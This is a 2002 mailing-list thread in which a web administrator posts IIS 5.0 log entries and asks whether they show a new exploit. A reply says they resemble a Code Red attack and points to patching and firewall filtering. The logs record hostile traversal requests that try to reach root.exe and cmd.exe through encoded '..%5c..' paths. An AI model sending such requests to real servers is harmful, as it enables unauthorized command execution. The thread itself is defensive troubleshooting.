With by "basic" green knowledge, it looks like regurlar code red attack.
As long as you are up to date on patches, including running IIS lockdown, you should be fine. But you could also stop it at the firewall and/or router. John Tolmachoff IT Manager, Network Engineer RelianceSoft, Inc. Fullerton, CA 92835 www.reliancesoft.com -----Original Message----- From: Steve Weitzman [mailto:[EMAIL PROTECTED]] Sent: Monday, July 01, 2002 10:14 PM To: [EMAIL PROTECTED] Subject: log question Over the last few days I have seen the same 15 or so lines appear in my MS2000 web logs several times. They are obvious hack attempts. What I need to know is whether this is a new exploit or one that I am already patched against. I have what I believe to be the latest patches from the Microsoft website. #Software: Microsoft Internet Information Services 5.0 #Version: 1.0 #Date: 2002-06-26 04:29:25 #Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs-host cs(User-Agent) cs(Referer) 2002-06-26 04:29:25 66.183.53.160 - 192.168.0.200 80 GET /scripts/root.exe /c+dir 404 www - - 2002-06-26 04:29:25 66.183.53.160 - 192.168.0.200 80 GET /MSADC/root.exe /c+dir 403 www - - 2002-06-26 04:29:26 66.183.53.160 - 192.168.0.200 80 GET /c/winnt/system32/cmd.exe /c+dir 404 www - - 2002-06-26 04:29:26 66.183.53.160 - 192.168.0.200 80 GET /d/winnt/system32/cmd.exe /c+dir 404 www - - 2002-06-26 04:29:27 66.183.53.160 - 192.168.0.200 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 www - - 2002-06-26 04:29:27 66.183.53.160 - 192.168.0.200 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 www - - 2002-06-26 04:29:27 66.183.53.160 - 192.168.0.200 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 www - - 2002-06-26 04:29:29 66.183.53.160 - 192.168.0.200 80 GET /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe /c+dir 403 www - - 2002-06-26 04:29:29 66.183.53.160 - 192.168.0.200 80 GET /scripts/..Á ../winnt/system32/cmd.exe /c+dir 500 www - - 2002-06-26 04:29:29 66.183.53.160 - 192.168.0.200 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 www - - 2002-06-26 04:29:30 66.183.53.160 - 192.168.0.200 80 GET /winnt/system32/cmd.exe /c+dir 404 www - - 2002-06-26 04:29:30 66.183.53.160 - 192.168.0.200 80 GET /winnt/system32/cmd.exe /c+dir 404 www - - 2002-06-26 04:29:30 66.183.53.160 - 192.168.0.200 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 www - - 2002-06-26 04:29:31 66.183.53.160 - 192.168.0.200 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 www - - 2002-06-26 04:29:31 66.183.53.160 - 192.168.0.200 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 www - - 2002-06-26 04:29:31 66.183.53.160 - 192.168.0.200 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 www - - Anyone know the answer or know where I need to go to find it? Steve Weitzman [EMAIL PROTECTED]
